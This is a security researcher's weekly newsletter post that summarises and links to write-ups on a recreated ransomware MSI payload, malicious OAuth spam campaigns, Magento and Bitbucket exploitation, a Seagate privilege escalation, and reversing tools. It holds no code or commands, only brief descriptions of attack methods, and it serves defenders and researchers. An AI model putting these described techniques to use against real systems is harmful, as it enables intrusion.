This post contains my best effort to simulate the MSI payload of the Gwisin Ransomware analyzed in the Ahnlab ASEC (hereinafter ASEC) team's blog post. The threat actors used an MSI payload that used the command line arguments to execute the Gwisin ransomware. This post will focus on creating a simple Proof of Concept MSI payload and not focus on the ransomware part of the payload.  

https://blog.sunggwanchoi.com/recreating-a-msi-payload-for-fun-and-no-profit/

Exploitation

What is being exploited.

Malicious OAuth applications used to compromise email servers and spread spam

More malicious OAuth activity in the real world, being used to compromise servers to send spam.

This recent attack involved a network of single-tenant applications installed in compromised organizations being used as the actor’s identity platform to perform the attack. As soon as the network was revealed, all the related applications were taken down and notifications to customers were sent, including recommended remediation steps.

This blog presents the technical analysis of this attack vector and the succeeding spam campaign attempted by the threat actor. It also provides guidance for defenders on protecting organizations from this threat, and how Microsoft security technologies detect it.

https://www.microsoft.com/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/

CVE-2022-24086: Surge in Magento 2 template attacks

eCommerce platform being exploited.

The critical template vulnerability in Magento 2 (CVE-2022-24086) is gaining popularity among eCommerce cyber criminals. The majority of recent [our] forensic cases concern this attack method. In this article we share our findings of 3 template hacks, and hope it will help you if you are confronted with a similar attack.

https://sansec.io/research/magento-2-template-attacks

CVE-2022-36804 Bitbucket Server Vulnerability Analysis / Exploitation

Chinese walkthrough on exploiting this vulnerability.

The effect of the officially disclosed vulnerability is that command execution is only possible with read-only permissions. By enumerating all the git commands that can be constructed with read-only permissions, a place for parameter injection is found, and a malicious URL is constructed whose access causes arbitrary command execution.

https://mp-weixin-qq-com.translate.goog/s/_UE74oRCRNkowaFLQEeOvw?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en&_x_tr_pto=wapp

CVE-2022-40286: Exploiting a Seagate service to create a SYSTEM shell

Matthew shows end-to-end exploitation of this driver and service. Another candidate for bring-your-own-vulnerable-driver.

https://www.x86matthew.com/view_post?id=windows_seagate_lpe

Tooling and Techniques

Low level tooling for attack and defence researchers.

Unflattening ConfuserEx .NET Code in IDA

GovCERT Switzerland brings the chocolates..

We’re studying the ConfuserEx obfuscation mechanism of a Ginzo .NET sample. This class of obfuscator is known as a code flattener. We describe how it can be dealt with using a Python script within IDA Pro, a famous reverse-engineering tool.

https://www.govcert.ch/blog/unflattening-confuserex-code-in-ida/

PE Bear

Portable Executable reversing tool with a friendly GUI - new open source from Hasherezade

PE-bear is a multiplatform reversing tool for PE files. Its objective is to deliver a fast and flexible “first view” for malware analysts, stable and capable of handling malformed PE files.

https://github.com/hasherezade/pe-bear

Footnotes

Some other small (and not so small) bits and bobs which might be of interest.

  • NIST release new security guidance: Implementing the Health Insurance Portability and Accountability Act (HIPAA) Security Rule: A Cybersecurity Resource Guide

  • USENIX Best Papers ‘22 - best of the best

  • Practical Guidance for IT Admins to respond after Ransomware attacks - nice guide for the non-cyber people out there.

  • Private Eye: On the Limits of Textual Screen Peeking via Eyeglass Reflections in Video Conferencing - academic work, but interesting.

  • CVSS: Ubiquitous and Broken - good summary of the challenges.

  • My Heart Belongs to Kashmir - An Analysis of a Pro-Indian Army Covert Influence Operation on Twitter - from Stanford

  • ‘Future Business Implications of a Balkanizing Internet’ - this outlines four scenarios and the various incentives of the competing parties - interesting thought piece - but not a super forecast.

  • Efficient Proofs of Software Exploitability for Real-world Processors - evidence base is limited to simple software and basic memory corruption.

  • Turning Your Computer Into a GPS Tracker With Apple Maps - 2 vulnerabilities in Apple Maps (now fixed) that allowed the extraction of the user's accurate location without authorization

  • Publication review report 74 regarding automated OSINT by the AIVD and MIVD - automated open source usage by Dutch intelligence

That’s all folks.. until next week..

1 Comment

Christopher Cottrell (writes Hacker Thoughts), Sep 26, 2022:

Thanks for putting this together

© 2023 Ollie Whitehouse from BinaryFirefly